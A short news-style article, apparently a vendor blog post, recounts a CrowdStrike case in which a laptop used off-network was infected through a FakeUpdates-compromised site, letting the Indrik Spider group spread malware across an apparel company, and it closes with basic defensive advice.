One Hacked Laptop Can Compromise a Network
If one laptop is hacked, it will likely lead to more. It can even compromise a company’s entire network. At least it did in the case of one worker that clicked on the wrong link at the wrong time. One click resulted in a major security breach.
A cybersecurity firm, Crowdstrike, sent out its Cyber Intrusion Services Casebook 2018 report as a reminder that laptops and other devices should be used within a secure network. Devices used in a public area or unsecured network an organization can be left exposed.
What exactly happened?
One person using a corporate laptop in a coffee shop got hacked. This was enough to allow a cybercrime group, later identified as Indrik Spider, to compromise an organization’s entire infrastructure.
- The employee visited one of the firm’s partner’s website. A phishing email directed the user to the site.
- The site that the user went to was compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and WordPress sites.
This malware shows users pop-ups, which tell the user that their browser software needs updating. - The malware then infected the laptop with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.
Unfortunately, the employee’s company security software relied on devices being inside the corporate network to pick up on any threats. However, since the laptop was used during the weekend and outside of the secured system, the company did not detect the breach until the computer was back in the office.
By that time, it was too late. The attackers were able to install Framework POS malware on the retail store server to steal credit card data.
Who were the attackers?
The culprits identify as Indrik Spider. Their hacking operation has been active since 2014 and heavily associates with Dridex and BitPaymer ransomware campaigns. These malware campaigns have netted the attackers millions of dollars.
There is an indication that this cybercrime group is expanding their operations since this is the first time they have been associated with FakeUpdates.
Who did this attack affect?
CrowdStrike did not name the company. However, it was noted as an apparel manufacturer “with an extensive global presence, including retail locations.”
They didn’t disclose if the attack was successful in stealing credit card data either. Their report is a lesson to companies so that they can avoid falling victim to similar campaigns.
How can users and companies avoid malware campaigns?
Malware affects both individual users and companies. Some Internet Service Providers (ISPs) are working with vendors to build in proactive security in to their networks (like Actiontec’s Optim platform). These efforts can safeguard homes, families and businesses by blocking users from visiting harmful webpages or protecting from other cyber security threats.
CrowdStrike recommends segregating accounts, and not giving end users administrator privileges on their local systems.
The cybersecurity firm stated that “attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases” that they saw this year.
Ultimately, the way to avoid these attacks is by being aware of them. “Businesses need to know how to better detect and protect against these [attacks],” said Bryan York, director of professional services at Crowdstrike.